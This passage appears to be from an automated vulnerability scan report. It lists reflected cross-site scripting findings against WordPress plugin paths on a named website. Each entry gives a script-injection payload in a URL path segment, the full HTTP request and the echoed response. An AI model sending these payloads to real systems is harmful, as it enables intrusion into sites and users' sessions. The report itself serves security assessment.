This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js49ac7"><script>alert(1)</script>8863cd0ea30 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:41 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js49ac7\"><script>alert(1)</script>8863cd0ea30" />
...[SNIP]...

1.199. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da0e"><script>alert(1)</script>0321b63fac9 was submitted in the REST URL parameter 1. This input was echoed as 1da0e\"><script>alert(1)</script>0321b63fac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content1da0e"><script>alert(1)</script>0321b63fac9/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:34 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content1da0e\"><script>alert(1)</script>0321b63fac9/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css" />
...[SNIP]...

1.200. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15055"><script>alert(1)</script>f8c0ae1a07a was submitted in the REST URL parameter 2. This input was echoed as 15055\"><script>alert(1)</script>f8c0ae1a07a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins15055"><script>alert(1)</script>f8c0ae1a07a/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:35 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins15055\"><script>alert(1)</script>f8c0ae1a07a/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css" />
...[SNIP]...

1.201. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0bc"><script>alert(1)</script>69c5d7af925 was submitted in the REST URL parameter 3. This input was echoed as fe0bc\"><script>alert(1)</script>69c5d7af925 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slidedeck-lite-for-wordpressfe0bc"><script>alert(1)</script>69c5d7af925/lib/wordpress-plugin.skin.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:36 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpressfe0bc\"><script>alert(1)</script>69c5d7af925/lib/wordpress-plugin.skin.css" />
...[SNIP]...

1.202. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bd7"><script>alert(1)</script>847e7d556d0 was submitted in the REST URL parameter 4. This input was echoed as 67bd7\"><script>alert(1)</script>847e7d556d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slidedeck-lite-for-wordpress/lib67bd7"><script>alert(1)</script>847e7d556d0/wordpress-plugin.skin.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:38 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpress/lib67bd7\"><script>alert(1)</script>847e7d556d0/wordpress-plugin.skin.css" />
...[SNIP]...

1.203. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f461"><script>alert(1)</script>2aabf40500e was submitted in the REST URL parameter 5. This input was echoed as 6f461\"><script>alert(1)</script>2aabf40500e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css6f461"><script>alert(1)</script>2aabf40500e HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:40 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css6f461\"><script>alert(1)</script>2aabf40500e" />
...[SNIP]...

1.204. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb5dd"><script>alert(1)</script>adde4188ba1 was submitted in the REST URL parameter 1. This input was echoed as cb5dd\"><script>alert(1)</script>adde4188ba1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentcb5dd"><script>alert(1)</script>adde4188ba1/plugins/tabbed-widgets/css/tabbed-widgets.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:34 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-contentcb5dd\"><script>alert(1)</script>adde4188ba1/plugins/tabbed-widgets/css/tabbed-widgets.css" />
...[SNIP]...

1.205. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f82aa"><script>alert(1)</script>23d2246834 was submitted in the REST URL parameter 2. This input was echoed as f82aa\"><script>alert(1)</script>23d2246834 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf82aa"><script>alert(1)</script>23d2246834/tabbed-widgets/css/tabbed-widgets.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:36 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/pluginsf82aa\"><script>alert(1)</script>23d2246834/tabbed-widgets/css/tabbed-widgets.css" />
...[SNIP]...

1.206. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ead5d"><script>alert(1)</script>e448c2dae68 was submitted in the REST URL parameter 3. This input was echoed as ead5d\"><script>alert(1)</script>e448c2dae68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgetsead5d"><script>alert(1)</script>e448c2dae68/css/tabbed-widgets.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:37 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgetsead5d\"><script>alert(1)</script>e448c2dae68/css/tabbed-widgets.css" />
...[SNIP]...

1.207. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 785fb"><script>alert(1)</script>20df5decad1 was submitted in the REST URL parameter 4. This input was echoed as 785fb\"><script>alert(1)</script>20df5decad1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets/css785fb"><script>alert(1)</script>20df5decad1/tabbed-widgets.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:39 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/css785fb\"><script>alert(1)</script>20df5decad1/tabbed-widgets.css" />
...[SNIP]...

1.208. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f1a3"><script>alert(1)</script>a9f182a0a62 was submitted in the REST URL parameter 5. This input was echoed as 7f1a3\"><script>alert(1)</script>a9f182a0a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css7f1a3"><script>alert(1)</script>a9f182a0a62 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:41 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css7f1a3\"><script>alert(1)</script>a9f182a0a62" />
...[SNIP]...

1.209. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb7d"><script>alert(1)</script>33e42537cc6 was submitted in the REST URL parameter 1. This input was echoed as 7eb7d\"><script>alert(1)</script>33e42537cc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content7eb7d"><script>alert(1)</script>33e42537cc6/plugins/tabbed-widgets/js/jquery-cookie.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:35 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content7eb7d\"><script>alert(1)</script>33e42537cc6/plugins/tabbed-widgets/js/jquery-cookie.min.js" />
...[SNIP]...

1.210. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d419"><script>alert(1)</script>497788cc897 was submitted in the REST URL parameter 2. This input was echoed as 3d419\"><script>alert(1)</script>497788cc897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins3d419"><script>alert(1)</script>497788cc897/tabbed-widgets/js/jquery-cookie.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:36 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins3d419\"><script>alert(1)</script>497788cc897/tabbed-widgets/js/jquery-cookie.min.js" />
...[SNIP]...

1.211. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 403c1"><script>alert(1)</script>8f85f524614 was submitted in the REST URL parameter 3. This input was echoed as 403c1\"><script>alert(1)</script>8f85f524614 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets403c1"><script>alert(1)</script>8f85f524614/js/jquery-cookie.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:38 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets403c1\"><script>alert(1)</script>8f85f524614/js/jquery-cookie.min.js" />
...[SNIP]...

1.212. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed152"><script>alert(1)</script>fc9de5f9c8a was submitted in the REST URL parameter 4. This input was echoed as ed152\"><script>alert(1)</script>fc9de5f9c8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets/jsed152"><script>alert(1)</script>fc9de5f9c8a/jquery-cookie.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:40 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
